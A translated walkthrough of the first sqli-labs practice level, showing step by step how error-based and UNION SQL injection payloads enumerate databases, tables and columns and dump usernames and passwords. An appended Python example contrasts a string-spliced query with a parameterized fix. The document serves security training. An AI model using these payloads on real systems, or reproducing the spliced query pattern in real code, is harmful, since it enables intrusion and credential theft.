SQL labs SQL injection platform - Level 1, Less-1: GET - Error based - Single quotes - String (error-based GET single-quote string injection)
2022-07-27 07:42:00 【Big white】
Remember to set magic_quotes_gpc to Off in php.ini:
Otherwise a \ escape is added to the symbols in the request parameters, so they cannot be spliced directly into the SQL statement.
Less-1 GET - Error based - Single quotes - String (error-based GET single-quote string injection)

The first level prompts us to supply an ID as the parameter, with a value.
Query id=1:
The page shows:
Your Login name:Dumb
Your Password:Dumb
Query id=1'
An error is returned. The output shows that 1' was spliced into the statement as '1'' LIMIT 0,1
LIMIT 0,1 means: start from row 0 of the table and read only one row.
Query 1' and '1'='2
No results are returned.
Query 1' and '1'='1
The result is returned normally.
This proves that the input is successfully spliced into the query.
Query 1' or 1=1; --+ which can return all the data in the table:
SELECT * FROM users WHERE id='1' or 1=1; -- ' LIMIT 0,1

However, in the source code the mysql_fetch_array function fetches only one row from the result set at a time, as an associative array:
So only one row of data is displayed on the front end at a time.
Next, let's find out how many columns of data this table has. First, sort the returned result by columns 1, 2 and 3:
Query
1' order by 3;--+

All of these return normally, which proves that the table has at least three columns.
Query
1' order by 4;--+

There is no 4th column, which shows that the table has only three columns.
So let's use a UNION query to look up the data in the table.
Query
0' union select 1,2,3 --+

Of the three columns queried, only 2 and 3 appear in the returned data, which means our injection points can only be columns 2 and 3.
2. Guess the database
Query the current database name:
0' union select 1,database(),3 --+

The current database name is security
You can also view the names of all databases:
0' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

This gets the names of all databases: information_schema,challenges,mysql,performance_schema,security,sys
3. Guess the database tables:
Then look up the table names in the security database:
id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

This gets the table names in the security database: emails,referers,uagents,users
4. Guess the fields
See what fields the users table has:
id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="security" and table_name="users" --+

Next, we can read the user name and password values:
id=0' union select 1,group_concat(username),3 from security.users --+

Read the password values:
id=0' union select 1,group_concat(password),3 from security.users --+

Successfully read the field value in the database
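
The splice that the id=1' test exposes, next to the corrected form, as an added example (not code from the original post or from the lab's source). It assumes Python with an in-memory SQLite table standing in for the lab's PHP and MySQL; the rows and the function names are constructed for illustration.

```python
import sqlite3

# Constructed sample rows (placeholders, not the lab's real table contents).
ROWS = [(1, "user_a", "pw_a"), (2, "user_b", "pw_b"), (3, "user_c", "pw_c")]
# Inputs taken from the walkthrough above ("--+" is written with a real space).
PROBES = ["1", "1'", "1' and '1'='2", "1' and '1'='1", "1' or 1=1; -- "]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def lookup_spliced(db, raw_id):
    """The pattern the level exercises: the request value is pasted between quotes."""
    sql = "SELECT * FROM users WHERE id='" + raw_id + "' LIMIT 0,1"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Echoing the database error to the client is what makes this "error based".
        return "SQL error: " + str(exc)


def lookup_bound(db, raw_id):
    """Hardened form: allow-list the id, then pass it as a bound parameter."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return []  # reject anything that is not a short run of digits
    # The value travels separately from the SQL text, so quotes cannot end a literal.
    return db.execute("SELECT * FROM users WHERE id = ? LIMIT 0,1", (int(raw_id),)).fetchall()


def compare():
    db = make_db()
    return [(p, lookup_spliced(db, p), lookup_bound(db, p)) for p in PROBES]


if __name__ == "__main__":
    for probe, spliced, bound in compare():
        print(repr(probe), "| spliced:", spliced, "| bound:", bound)
```

In the lab's PHP the equivalent fix is a prepared statement (mysqli or PDO) with the id bound as a parameter. Hiding the database error text removes the feedback used above but leaves the splice itself in place.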